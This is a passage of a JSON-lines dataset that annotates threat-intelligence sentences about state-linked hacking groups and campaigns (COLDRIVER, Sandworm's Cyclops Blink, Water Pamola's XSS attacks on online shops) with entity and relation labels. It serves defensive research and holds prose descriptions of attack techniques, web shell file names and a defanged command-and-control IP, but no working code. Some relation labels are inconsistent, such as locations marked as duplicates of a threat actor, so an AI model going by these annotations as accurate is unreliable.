Mongolia.","entities":[{"id":51145,"label":"location","start_offset":220,"end_offset":227},{"id":51148,"label":"location","start_offset":253,"end_offset":261},{"id":51149,"label":"identity","start_offset":179,"end_offset":216},{"id":51141,"label":"identity","start_offset":47,"end_offset":50},{"id":51142,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":51143,"label":"identity","start_offset":112,"end_offset":115},{"id":51144,"label":"identity","start_offset":130,"end_offset":145},{"id":51146,"label":"location","start_offset":229,"end_offset":235},{"id":51147,"label":"location","start_offset":237,"end_offset":247}],"relations":[{"id":1050,"from_id":51142,"to_id":51144,"type":"attributed-to"},{"id":1051,"from_id":51142,"to_id":51149,"type":"targets"},{"id":1052,"from_id":51142,"to_id":51145,"type":"targets"},{"id":1053,"from_id":51142,"to_id":51146,"type":"targets"},{"id":1054,"from_id":51142,"to_id":51147,"type":"targets"},{"id":1055,"from_id":51142,"to_id":51148,"type":"targets"}],"Comments":[]} {"id":5056,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":51151,"label":"threat-actor","start_offset":30,"end_offset":43},{"id":51152,"label":"threat-actor","start_offset":55,"end_offset":64},{"id":51153,"label":"location","start_offset":68,"end_offset":75},{"id":51154,"label":"threat-actor","start_offset":120,"end_offset":127},{"id":51155,"label":"attack-pattern","start_offset":142,"end_offset":171},{"id":51157,"label":"identity","start_offset":226,"end_offset":255},{"id":51158,"label":"identity","start_offset":263,"end_offset":295},{"id":51156,"label":"identity","start_offset":191,"end_offset":220}],"relations":[{"id":1056,"from_id":51152,"to_id":51153,"type":"located-at"},{"id":1057,"from_id":51154,"to_id":51152,"type":"duplicate-of"},{"id":1058,"from_id":51152,"to_id":51155,"type":"uses"},{"id":1059,"from_id":51152,"to_id":51156,"type":"targets"},{"id":1060,"from_id":51152,"to_id":51157,"type":"targets"},{"id":1061,"from_id":51152,"to_id":51158,"type":"targets"}],"Comments":[]} {"id":5057,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":51162,"label":"identity","start_offset":142,"end_offset":167},{"id":51159,"label":"identity","start_offset":29,"end_offset":32},{"id":51160,"label":"threat-actor","start_offset":46,"end_offset":55},{"id":51161,"label":"identity","start_offset":101,"end_offset":127}],"relations":[{"id":1062,"from_id":51160,"to_id":51161,"type":"targets"},{"id":1063,"from_id":51160,"to_id":51162,"type":"targets"}],"Comments":[]} {"id":5060,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":51165,"label":"location","start_offset":72,"end_offset":82},{"id":51166,"label":"campaign","start_offset":145,"end_offset":174},{"id":15621,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":15623,"label":"threat-actor","start_offset":57,"end_offset":68}],"relations":[{"id":1064,"from_id":15623,"to_id":51165,"type":"located-at"},{"id":1065,"from_id":15623,"to_id":51166,"type":"uses"}],"Comments":[]} {"id":5063,"text":"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites.","entities":[{"id":51170,"label":"attack-pattern","start_offset":111,"end_offset":173},{"id":51169,"label":"threat-actor","start_offset":0,"end_offset":11}],"relations":[{"id":1066,"from_id":51169,"to_id":51170,"type":"uses"}],"Comments":[]} {"id":5066,"text":"Recently observed Ghostwriter credential phishing domains:","entities":[{"id":51172,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":51173,"label":"attack-pattern","start_offset":30,"end_offset":49}],"relations":[{"id":1067,"from_id":51172,"to_id":51173,"type":"uses"}],"Comments":[]} {"id":5070,"text":"On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.","entities":[{"id":51176,"label":"TIME","start_offset":3,"end_offset":14},{"id":51177,"label":"identity","start_offset":16,"end_offset":37},{"id":51178,"label":"threat-actor","start_offset":62,"end_offset":108},{"id":51179,"label":"vulnerability","start_offset":122,"end_offset":157},{"id":51180,"label":"vulnerability","start_offset":169,"end_offset":182},{"id":51181,"label":"SOFTWARE","start_offset":161,"end_offset":167}],"relations":[{"id":1068,"from_id":51179,"to_id":51180,"type":"duplicate-of"},{"id":1069,"from_id":51181,"to_id":51180,"type":"has"},{"id":1070,"from_id":51178,"to_id":51180,"type":"exploits"}],"Comments":[]} {"id":5108,"text":"  [Lightly edited transcript of the video above] Hi there, Mark Nunnikhoven from Trend Micro Research, I want to talk to you about the concept of lateral movement.","entities":[{"id":51211,"label":"attack-pattern","start_offset":155,"end_offset":171},{"id":51209,"label":"identity","start_offset":68,"end_offset":84},{"id":51210,"label":"identity","start_offset":90,"end_offset":110}],"relations":[{"id":1071,"from_id":51209,"to_id":51210,"type":"related-to"}],"Comments":[]} {"id":5230,"text":"We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware’s payload is a package called watchdog.","entities":[{"id":51263,"label":"malware","start_offset":111,"end_offset":119},{"id":51262,"label":"malware","start_offset":41,"end_offset":60},{"id":16073,"label":"malware","start_offset":30,"end_offset":39}],"relations":[{"id":1072,"from_id":51262,"to_id":16073,"type":"duplicate-of"}],"Comments":[]} {"id":5245,"text":" Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT.","entities":[{"id":51279,"label":"campaign","start_offset":1,"end_offset":7},{"id":51280,"label":"malware","start_offset":132,"end_offset":137}],"relations":[{"id":1073,"from_id":51279,"to_id":51280,"type":"uses"}],"Comments":[]} {"id":5249,"text":"We correlated the AnubisSpy variants to Sphinx’s desktop\/PC-targeting malware through the following: Shared C&C server, 86[.]105[.]18[.]107 Shared technique of decrypting JSON files, and similarity between the file structures of AnubisSpy and Sphinx’s malware Similar targets (highly concentrated in Middle Eastern countries) Figure 2: Comparison of file structure in Sphinx’s desktop\/PC-targeting malware (left) and AnubisSpy (right)","entities":[{"id":51288,"label":"malware","start_offset":18,"end_offset":27},{"id":51287,"label":"location","start_offset":301,"end_offset":315},{"id":16131,"label":"IPV4","start_offset":121,"end_offset":140},{"id":16134,"label":"malware","start_offset":230,"end_offset":239},{"id":16130,"label":"campaign","start_offset":40,"end_offset":46},{"id":16142,"label":"malware","start_offset":422,"end_offset":431},{"id":16140,"label":"campaign","start_offset":373,"end_offset":379},{"id":16136,"label":"campaign","start_offset":244,"end_offset":250}],"relations":[{"id":1074,"from_id":16130,"to_id":51288,"type":"uses"},{"id":1075,"from_id":16131,"to_id":16130,"type":"indicates"},{"id":1076,"from_id":16136,"to_id":51287,"type":"targets"},{"id":1077,"from_id":16134,"to_id":51287,"type":"targets"}],"Comments":[]} {"id":5279,"text":"Cyclops Blink, an advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group, has recently been used to target WatchGuard Firebox devices according to an analysis performed by the UK’s National Cyber Security Centre (NCSC).","entities":[{"id":51322,"label":"malware","start_offset":0,"end_offset":13},{"id":51324,"label":"threat-actor","start_offset":87,"end_offset":98},{"id":51323,"label":"threat-actor","start_offset":75,"end_offset":83},{"id":51325,"label":"identity","start_offset":241,"end_offset":283}],"relations":[{"id":1078,"from_id":51324,"to_id":51323,"type":"duplicate-of"},{"id":1079,"from_id":51322,"to_id":51323,"type":"related-to"}],"Comments":[]} {"id":5284,"text":"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.","entities":[{"id":51332,"label":"malware","start_offset":34,"end_offset":47},{"id":51334,"label":"SOFTWARE","start_offset":109,"end_offset":127},{"id":51335,"label":"SOFTWARE","start_offset":132,"end_offset":144}],"relations":[{"id":1080,"from_id":51332,"to_id":51334,"type":"targets"},{"id":1081,"from_id":51332,"to_id":51335,"type":"targets"}],"Comments":[]} {"id":5287,"text":" The Sandworm APT group has been attributed as creating both Cyclops Blink and the VPNFilter internet of things (IoT) botnet.","entities":[{"id":51338,"label":"threat-actor","start_offset":6,"end_offset":14},{"id":51339,"label":"malware","start_offset":62,"end_offset":75},{"id":51340,"label":"malware","start_offset":84,"end_offset":93}],"relations":[{"id":1083,"from_id":51340,"to_id":51338,"type":"attributed-to"},{"id":1082,"from_id":51339,"to_id":51338,"type":"attributed-to"}],"Comments":[]} {"id":5411,"text":"The vendors that were targeted by VPNFilter were Asus, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZDE.","entities":[{"id":51412,"label":"identity","start_offset":99,"end_offset":103},{"id":51415,"label":"identity","start_offset":135,"end_offset":138},{"id":51409,"label":"identity","start_offset":71,"end_offset":78},{"id":51410,"label":"identity","start_offset":80,"end_offset":88},{"id":51405,"label":"malware","start_offset":34,"end_offset":43},{"id":51406,"label":"identity","start_offset":49,"end_offset":53},{"id":51407,"label":"identity","start_offset":55,"end_offset":61},{"id":51408,"label":"identity","start_offset":63,"end_offset":69},{"id":51411,"label":"identity","start_offset":90,"end_offset":97},{"id":51413,"label":"identity","start_offset":105,"end_offset":112},{"id":51414,"label":"identity","start_offset":114,"end_offset":122}],"relations":[{"id":1084,"from_id":51405,"to_id":51406,"type":"targets"},{"id":1085,"from_id":51405,"to_id":51407,"type":"targets"},{"id":1086,"from_id":51405,"to_id":51408,"type":"targets"},{"id":1087,"from_id":51405,"to_id":51409,"type":"targets"},{"id":1089,"from_id":51405,"to_id":51411,"type":"targets"},{"id":1090,"from_id":51405,"to_id":51412,"type":"targets"},{"id":1091,"from_id":51405,"to_id":51413,"type":"targets"},{"id":1088,"from_id":51405,"to_id":51410,"type":"targets"},{"id":1092,"from_id":51405,"to_id":51414,"type":"targets"},{"id":1093,"from_id":51405,"to_id":51415,"type":"targets"}],"Comments":[]} {"id":5416,"text":"Asus is likely only one of the vendors that is currently being targeted by Cyclops Blink.","entities":[{"id":51420,"label":"identity","start_offset":0,"end_offset":4},{"id":51421,"label":"malware","start_offset":75,"end_offset":88}],"relations":[{"id":1094,"from_id":51421,"to_id":51420,"type":"targets"}],"Comments":[]} {"id":5438,"text":"While the Cyclops Blink malware variant that we analyzed in this report is complicated in nature, one thing proves to be unmistakable when it comes to the Sandworm group that created it: Sandworm is a persistent and sophisticated group whose motives are clearly at odds with those that would be expected from groups that are primarily financially motivated.","entities":[{"id":51438,"label":"threat-actor","start_offset":155,"end_offset":163},{"id":51437,"label":"malware","start_offset":10,"end_offset":23},{"id":51439,"label":"threat-actor","start_offset":187,"end_offset":195}],"relations":[{"id":1095,"from_id":51437,"to_id":51438,"type":"attributed-to"}],"Comments":[]} {"id":5462,"text":"We stumbled upon the Confucius hacking group while delving into Patchwork’s cyberespionage operations, and found a number of similarities.","entities":[{"id":51448,"label":"threat-actor","start_offset":64,"end_offset":73},{"id":51449,"label":"threat-actor","start_offset":21,"end_offset":30}],"relations":[{"id":1096,"from_id":51449,"to_id":51448,"type":"related-to"}],"Comments":[]} {"id":5469,"text":"While Patchwork may be more straightforward with its predominantly malware-based attacks, Confucius’ can be inferred to be more nuanced, relying heavily on social engineering.","entities":[{"id":51455,"label":"threat-actor","start_offset":90,"end_offset":99},{"id":51456,"label":"attack-pattern","start_offset":156,"end_offset":174},{"id":51457,"label":"attack-pattern","start_offset":67,"end_offset":88},{"id":51454,"label":"threat-actor","start_offset":6,"end_offset":15}],"relations":[{"id":1097,"from_id":51454,"to_id":51457,"type":"uses"},{"id":1098,"from_id":51455,"to_id":51456,"type":"uses"}],"Comments":[]} {"id":5482,"text":"hayat22, supposedly a female student, engaged in an online romance with a target whose handle was love, describing himself as living in South Asia working in garments manufacturing and wholesaling.","entities":[{"id":51475,"label":"identity","start_offset":0,"end_offset":7},{"id":51476,"label":"location","start_offset":136,"end_offset":146},{"id":51482,"label":"identity","start_offset":98,"end_offset":102}],"relations":[{"id":1099,"from_id":51475,"to_id":51476,"type":"located-at"}],"Comments":[]} {"id":5499,"text":"Compared to Patchwork, whose Trojanized documents exploit at least five security flaws, Confucius’ backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882.","entities":[{"id":51507,"label":"attack-pattern","start_offset":144,"end_offset":172},{"id":51504,"label":"threat-actor","start_offset":88,"end_offset":97},{"id":51503,"label":"threat-actor","start_offset":12,"end_offset":21},{"id":51505,"label":"vulnerability","start_offset":189,"end_offset":202},{"id":51506,"label":"vulnerability","start_offset":207,"end_offset":221}],"relations":[{"id":1100,"from_id":51504,"to_id":51507,"type":"uses"}],"Comments":[]} {"id":13006,"text":"Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia.","entities":[{"id":48807,"label":"location","start_offset":243,"end_offset":255},{"id":48810,"label":"threat-actor","start_offset":70,"end_offset":83},{"id":48811,"label":"location","start_offset":111,"end_offset":119},{"id":48809,"label":"location","start_offset":232,"end_offset":239},{"id":48808,"label":"location","start_offset":223,"end_offset":230},{"id":48813,"label":"location","start_offset":119,"end_offset":126},{"id":48812,"label":"identity","start_offset":119,"end_offset":126},{"id":40519,"label":"threat-actor","start_offset":18,"end_offset":29},{"id":40520,"label":"attack-pattern","start_offset":41,"end_offset":49}],"relations":[{"id":466,"from_id":48810,"to_id":48812,"type":"attributed-to"}],"Comments":[]} {"id":13023,"text":"Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.","entities":[{"id":48841,"label":"identity","start_offset":130,"end_offset":145},{"id":48843,"label":"location","start_offset":220,"end_offset":227},{"id":48840,"label":"threat-actor","start_offset":89,"end_offset":102},{"id":48842,"label":"identity","start_offset":112,"end_offset":116},{"id":48845,"label":"location","start_offset":237,"end_offset":247},{"id":48839,"label":"identity","start_offset":47,"end_offset":51},{"id":48844,"label":"location","start_offset":229,"end_offset":235},{"id":48846,"label":"location","start_offset":253,"end_offset":261}],"relations":[{"id":467,"from_id":48840,"to_id":48841,"type":"attributed-to"},{"id":468,"from_id":48840,"to_id":48843,"type":"duplicate-of"},{"id":469,"from_id":48840,"to_id":48844,"type":"duplicate-of"},{"id":470,"from_id":48840,"to_id":48845,"type":"duplicate-of"},{"id":471,"from_id":48840,"to_id":48846,"type":"duplicate-of"}],"Comments":[]} {"id":13025,"text":"Recently observed IPs used in Curious Gorge campaigns: COLDRIVER, a Russian-based threat actor sometimes referred to as Calisto, has launched credential phishing campaigns, targeting several US based NGOs and think tanks, the military of a Balkans country, and a Ukraine based defense contractor.","entities":[{"id":48848,"label":"threat-actor","start_offset":30,"end_offset":43},{"id":48849,"label":"campaign","start_offset":55,"end_offset":64},{"id":48853,"label":"location","start_offset":240,"end_offset":255},{"id":48854,"label":"location","start_offset":263,"end_offset":271},{"id":48855,"label":"identity","start_offset":277,"end_offset":295},{"id":48856,"label":"identity","start_offset":200,"end_offset":205},{"id":48857,"label":"identity","start_offset":209,"end_offset":220},{"id":48858,"label":"location","start_offset":191,"end_offset":194},{"id":48850,"label":"threat-actor","start_offset":120,"end_offset":127},{"id":48851,"label":"attack-pattern","start_offset":142,"end_offset":161},{"id":48859,"label":"identity","start_offset":226,"end_offset":235}],"relations":[{"id":473,"from_id":48859,"to_id":48853,"type":"located-at"},{"id":474,"from_id":48856,"to_id":48858,"type":"located-at"},{"id":475,"from_id":48857,"to_id":48858,"type":"located-at"},{"id":472,"from_id":48855,"to_id":48854,"type":"located-at"},{"id":476,"from_id":48850,"to_id":48851,"type":"uses"},{"id":477,"from_id":48850,"to_id":48856,"type":"duplicate-of"},{"id":478,"from_id":48850,"to_id":48857,"type":"duplicate-of"},{"id":479,"from_id":48850,"to_id":48859,"type":"duplicate-of"},{"id":480,"from_id":48850,"to_id":48855,"type":"duplicate-of"},{"id":481,"from_id":48850,"to_id":48849,"type":"related-to"}],"Comments":[]} {"id":13026,"text":"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence.","entities":[{"id":48860,"label":"campaign","start_offset":46,"end_offset":56},{"id":48861,"label":"identity","start_offset":80,"end_offset":89},{"id":48862,"label":"identity","start_offset":142,"end_offset":167},{"id":48863,"label":"location","start_offset":101,"end_offset":117}],"relations":[{"id":482,"from_id":48861,"to_id":48863,"type":"located-at"},{"id":484,"from_id":48860,"to_id":48862,"type":"targets"},{"id":483,"from_id":48860,"to_id":48861,"type":"targets"}],"Comments":[]} {"id":13029,"text":"Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.","entities":[{"id":48866,"label":"campaign","start_offset":18,"end_offset":28},{"id":48867,"label":"attack-pattern","start_offset":28,"end_offset":48},{"id":48868,"label":"threat-actor","start_offset":57,"end_offset":68},{"id":48869,"label":"location","start_offset":72,"end_offset":83},{"id":48870,"label":"attack-pattern","start_offset":145,"end_offset":164}],"relations":[{"id":485,"from_id":48866,"to_id":48867,"type":"uses"}],"Comments":[]} {"id":13146,"text":"Tropic Trooper, a threat actor group that targets government, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong, has been active since 2011.","entities":[{"id":48920,"label":"identity","start_offset":104,"end_offset":124},{"id":48922,"label":"location","start_offset":140,"end_offset":151},{"id":48924,"label":"TIME","start_offset":184,"end_offset":194},{"id":48916,"label":"identity","start_offset":50,"end_offset":60},{"id":48921,"label":"location","start_offset":128,"end_offset":134},{"id":48915,"label":"threat-actor","start_offset":0,"end_offset":14},{"id":48917,"label":"identity","start_offset":62,"end_offset":70},{"id":48918,"label":"identity","start_offset":72,"end_offset":82},{"id":48919,"label":"identity","start_offset":84,"end_offset":98},{"id":48923,"label":"location","start_offset":157,"end_offset":166}],"relations":[{"id":491,"from_id":48920,"to_id":48921,"type":"located-at"},{"id":492,"from_id":48916,"to_id":48921,"type":"located-at"},{"id":487,"from_id":48915,"to_id":48917,"type":"targets"},{"id":488,"from_id":48915,"to_id":48918,"type":"targets"},{"id":489,"from_id":48915,"to_id":48919,"type":"targets"},{"id":494,"from_id":48916,"to_id":48922,"type":"located-at"},{"id":495,"from_id":48916,"to_id":48923,"type":"located-at"},{"id":496,"from_id":48917,"to_id":48921,"type":"located-at"},{"id":497,"from_id":48915,"to_id":48916,"type":"targets"},{"id":498,"from_id":48915,"to_id":48924,"type":"related-to"},{"id":493,"from_id":48918,"to_id":48922,"type":"targets"}],"Comments":[]} {"id":13147,"text":"The group was reportedly using spear-phishing emails with weaponized attachments to exploit known vulnerabilities.","entities":[{"id":48925,"label":"attack-pattern","start_offset":31,"end_offset":45},{"id":48926,"label":"threat-actor","start_offset":4,"end_offset":10}],"relations":[{"id":499,"from_id":48926,"to_id":48925,"type":"uses"}],"Comments":[]} {"id":13149,"text":"We found that Tropic Trooper’s latest activities center on targeting Taiwanese and the Philippine military’s physically isolated networks through a USBferry attack (the name derived from a sample found in a related research).","entities":[{"id":48927,"label":"threat-actor","start_offset":14,"end_offset":28},{"id":48928,"label":"location","start_offset":69,"end_offset":79},{"id":48929,"label":"location","start_offset":87,"end_offset":98},{"id":48931,"label":"identity","start_offset":98,"end_offset":109},{"id":48930,"label":"malware","start_offset":148,"end_offset":163}],"relations":[{"id":500,"from_id":48931,"to_id":48929,"type":"located-at"},{"id":501,"from_id":48931,"to_id":48928,"type":"located-at"},{"id":503,"from_id":48927,"to_id":48930,"type":"uses"},{"id":502,"from_id":48927,"to_id":48931,"type":"targets"}],"Comments":[]} {"id":13156,"text":"A sample scenario of the USBferry attack Tropic Trooper is well aware that military or government organizations may have more robust security in their physically isolated environments (i.e., the use of biometrics or USB use in a quarantined machine before an air-gapped environment).","entities":[{"id":48940,"label":"threat-actor","start_offset":41,"end_offset":55},{"id":48939,"label":"malware","start_offset":25,"end_offset":34}],"relations":[{"id":504,"from_id":48939,"to_id":48940,"type":"related-to"}],"Comments":[]} {"id":13472,"text":"We continue to see attacks from groups like Charming Kitten on medical and healthcare professionals, including World Health Organization (WHO) employees.","entities":[{"id":51544,"label":"threat-actor","start_offset":44,"end_offset":59},{"id":51545,"label":"identity","start_offset":111,"end_offset":142}],"relations":[{"id":1101,"from_id":51544,"to_id":51545,"type":"targets"}],"Comments":[]} {"id":13474,"text":"As one example, we've seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO.","entities":[{"id":51546,"label":"threat-actor","start_offset":45,"end_offset":66},{"id":51547,"label":"location","start_offset":82,"end_offset":87},{"id":51548,"label":"identity","start_offset":141,"end_offset":144}],"relations":[{"id":1102,"from_id":51546,"to_id":51548,"type":"targets"},{"id":1103,"from_id":51546,"to_id":51547,"type":"located-at"}],"Comments":[]} {"id":13499,"text":"While it offers standard mailbox copies that was likely stolen with the help of credential phishing, Void Balaur also offers copies of mailboxes that have not been interacted with — for a higher price.","entities":[{"id":51567,"label":"threat-actor","start_offset":101,"end_offset":112},{"id":51568,"label":"attack-pattern","start_offset":80,"end_offset":99}],"relations":[{"id":1104,"from_id":51567,"to_id":51568,"type":"uses"}],"Comments":[]} {"id":13539,"text":"The campaign initially compromised e-commerce online shops in Japan, Australia, and European countries via spam emails with malicious attachments.","entities":[{"id":51605,"label":"attack-pattern","start_offset":107,"end_offset":118},{"id":51606,"label":"campaign","start_offset":4,"end_offset":12},{"id":51607,"label":"identity","start_offset":35,"end_offset":58},{"id":51601,"label":"location","start_offset":62,"end_offset":67},{"id":51602,"label":"location","start_offset":69,"end_offset":78},{"id":51603,"label":"location","start_offset":84,"end_offset":92}],"relations":[{"id":1105,"from_id":51606,"to_id":51607,"type":"targets"},{"id":1106,"from_id":51607,"to_id":51601,"type":"located-at"},{"id":1107,"from_id":51607,"to_id":51602,"type":"located-at"},{"id":1108,"from_id":51607,"to_id":51603,"type":"located-at"},{"id":1110,"from_id":51606,"to_id":51605,"type":"uses"}],"Comments":[]} {"id":13541,"text":"Victims are now mainly located only in Japan.","entities":[{"id":51611,"label":"location","start_offset":39,"end_offset":44},{"id":51612,"label":"identity","start_offset":0,"end_offset":7}],"relations":[{"id":1111,"from_id":51612,"to_id":51611,"type":"located-at"}],"Comments":[]} {"id":13543,"text":"Instead, malicious scripts are being executed when the administrators look into customer orders in their online shop’s administration panel.","entities":[{"id":51614,"label":"identity","start_offset":55,"end_offset":69},{"id":51615,"label":"SOFTWARE","start_offset":105,"end_offset":139},{"id":51616,"label":"malware","start_offset":9,"end_offset":26}],"relations":[{"id":1112,"from_id":51616,"to_id":51615,"type":"targets"},{"id":1113,"from_id":51614,"to_id":51615,"type":"uses"}],"Comments":[]} {"id":13545,"text":"The Water Pamola attack chain After further searching, we noticed that an online store administrator asked about a strange online order that contains JavaScript code inserted into the field where the customer’s address or company name would normally be located.","entities":[{"id":51617,"label":"campaign","start_offset":4,"end_offset":16},{"id":51618,"label":"identity","start_offset":79,"end_offset":105},{"id":51620,"label":"attack-pattern","start_offset":155,"end_offset":179}],"relations":[{"id":1114,"from_id":51617,"to_id":51620,"type":"uses"}],"Comments":[]} {"id":13546,"text":"This script is likely activated by exploiting a cross-site scripting (XSS) vulnerability in the said store’s administration portal.","entities":[{"id":51622,"label":"SOFTWARE","start_offset":101,"end_offset":130},{"id":51623,"label":"malware","start_offset":5,"end_offset":11},{"id":51621,"label":"attack-pattern","start_offset":48,"end_offset":74}],"relations":[{"id":1115,"from_id":51623,"to_id":51622,"type":"targets"},{"id":1116,"from_id":51623,"to_id":51621,"type":"uses"}],"Comments":[]} {"id":13551,"text":"The script connects to the Water Pamola’s server and downloads additional payloads.","entities":[{"id":51627,"label":"malware","start_offset":4,"end_offset":10},{"id":51626,"label":"Infrastucture","start_offset":27,"end_offset":48}],"relations":[{"id":1117,"from_id":51627,"to_id":51626,"type":"beacons-to"}],"Comments":[]} {"id":13552,"text":"Taken together, this led us to believe that Water Pamola places orders with this embedded XSS script across many targeted online shops.","entities":[{"id":51628,"label":"campaign","start_offset":44,"end_offset":56},{"id":42261,"label":"attack-pattern","start_offset":90,"end_offset":93}],"relations":[{"id":1118,"from_id":51628,"to_id":42261,"type":"uses"}],"Comments":[]} {"id":13561,"text":"As previously mentioned, Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators.","entities":[{"id":51638,"label":"campaign","start_offset":25,"end_offset":37},{"id":51639,"label":"attack-pattern","start_offset":92,"end_offset":95},{"id":51640,"label":"identity","start_offset":113,"end_offset":138}],"relations":[{"id":1119,"from_id":51638,"to_id":51640,"type":"targets"},{"id":1120,"from_id":51638,"to_id":51639,"type":"uses"}],"Comments":[]} {"id":13563,"text":"If the store’s e-commerce system is vulnerable to XSS attacks, the malicious script will be loaded and executed on the merchant’s management panel once someone (like a system administrator or store employee) opens the said order.","entities":[{"id":51641,"label":"attack-pattern","start_offset":50,"end_offset":53},{"id":51642,"label":"malware","start_offset":67,"end_offset":83},{"id":51643,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":1121,"from_id":51642,"to_id":51643,"type":"targets"},{"id":1122,"from_id":51642,"to_id":51641,"type":"uses"}],"Comments":[]} {"id":13565,"text":"The source code of this framework is shared across many Chinese public forums.","entities":[{"id":51646,"label":"location","start_offset":56,"end_offset":63},{"id":51647,"label":"tools","start_offset":24,"end_offset":33}],"relations":[{"id":1123,"from_id":51647,"to_id":51646,"type":"related-to"}],"Comments":[]} {"id":13576,"text":"If the victim enters the credential in the fake form and clicks anywhere on the page, the script will take the credentials, encode them using base64, replace some characters with custom substrings, and then upload these to Water Pamola’s server. Figure 4.","entities":[{"id":51656,"label":"Infrastucture","start_offset":223,"end_offset":244},{"id":51657,"label":"malware","start_offset":90,"end_offset":96}],"relations":[{"id":1124,"from_id":51657,"to_id":51656,"type":"communicates-with"}],"Comments":[]} {"id":13581,"text":"Some of the delivered malicious scripts attempt to install backdoors to the websites built with the EC-CUBE framework, which is popular in Japan.","entities":[{"id":51662,"label":"tools","start_offset":100,"end_offset":117},{"id":51664,"label":"malware","start_offset":22,"end_offset":39},{"id":51663,"label":"location","start_offset":139,"end_offset":144}],"relations":[{"id":1125,"from_id":51662,"to_id":51663,"type":"related-to"},{"id":1126,"from_id":51664,"to_id":51662,"type":"targets"}],"Comments":[]} {"id":13585,"text":"The name of the web shell file is hardcoded to be either “ec_ver.php,” “log3.php,” or “temp.php.”","entities":[{"id":51670,"label":"FILEPATH","start_offset":58,"end_offset":69},{"id":51671,"label":"FILEPATH","start_offset":72,"end_offset":80},{"id":51672,"label":"FILEPATH","start_offset":87,"end_offset":95},{"id":42348,"label":"attack-pattern","start_offset":16,"end_offset":25}],"relations":[{"id":1127,"from_id":42348,"to_id":51670,"type":"related-to"},{"id":1128,"from_id":42348,"to_id":51671,"type":"related-to"},{"id":1129,"from_id":42348,"to_id":51672,"type":"related-to"}],"Comments":[]} {"id":13588,"text":"The blog post describes a web shell with two components — a PHP script and an HTML uploading file — however, the second one is not needed as the proper POST request can be created with any custom or third-party tool (e.g., Fiddler). Figure 6.","entities":[{"id":51676,"label":"tools","start_offset":26,"end_offset":35},{"id":51677,"label":"tools","start_offset":60,"end_offset":71},{"id":51678,"label":"tools","start_offset":78,"end_offset":97}],"relations":[{"id":1130,"from_id":51676,"to_id":51677,"type":"consists-of"},{"id":1131,"from_id":51676,"to_id":51678,"type":"consists-of"}],"Comments":[]} {"id":13595,"text":"The plugin has been designed to drop multiple PHP web shell files on the server.","entities":[{"id":51684,"label":"Infrastucture","start_offset":73,"end_offset":79},{"id":42379,"label":"attack-pattern","start_offset":50,"end_offset":59}],"relations":[{"id":1132,"from_id":42379,"to_id":51684,"type":"targets"}],"Comments":[]} {"id":13600,"text":"(Note that Flash has been declared end-of-life by Adobe since December 31, 2020.) If the victim downloads and executes the installer downloaded from this page, the victim will be infected with a variant of Gh0stRat malware, previously also named Gh0stCringe or CineregRAT.","entities":[{"id":51687,"label":"TIME","start_offset":62,"end_offset":79},{"id":51688,"label":"malware","start_offset":207,"end_offset":215},{"id":51689,"label":"malware","start_offset":247,"end_offset":258},{"id":51690,"label":"malware","start_offset":262,"end_offset":272}],"relations":[{"id":1133,"from_id":51688,"to_id":51689,"type":"related-to"},{"id":1134,"from_id":51688,"to_id":51690,"type":"related-to"}],"Comments":[]} {"id":13602,"text":"The Gh0st RAT samples related to this campaign are obfuscated executable files, which decrypt the main payload in memory and execute its main export function named “Shellex.” Figure","entities":[{"id":51695,"label":"FILEPATH","start_offset":165,"end_offset":172},{"id":51694,"label":"malware","start_offset":4,"end_offset":13}],"relations":[{"id":1135,"from_id":51694,"to_id":51695,"type":"related-to"}],"Comments":[]} {"id":13610,"text":"In this example, AdobeAirFlashInstaller.exe (legitimate file) sideloads xerces-c_2_1_0.dll (patched legitimate file), which then sideloads ulibs.dll (malicious file).","entities":[{"id":51698,"label":"FILEPATH","start_offset":139,"end_offset":148},{"id":51696,"label":"FILEPATH","start_offset":17,"end_offset":43},{"id":51697,"label":"FILEPATH","start_offset":72,"end_offset":90}],"relations":[{"id":1136,"from_id":51696,"to_id":51697,"type":"related-to"},{"id":1137,"from_id":51697,"to_id":51698,"type":"related-to"}],"Comments":[]} {"id":13615,"text":"Here, svchost.exe (renamed legitimate and signed Launcher.exe file from Tencent) sideloads Utility.dll (patched legitimate 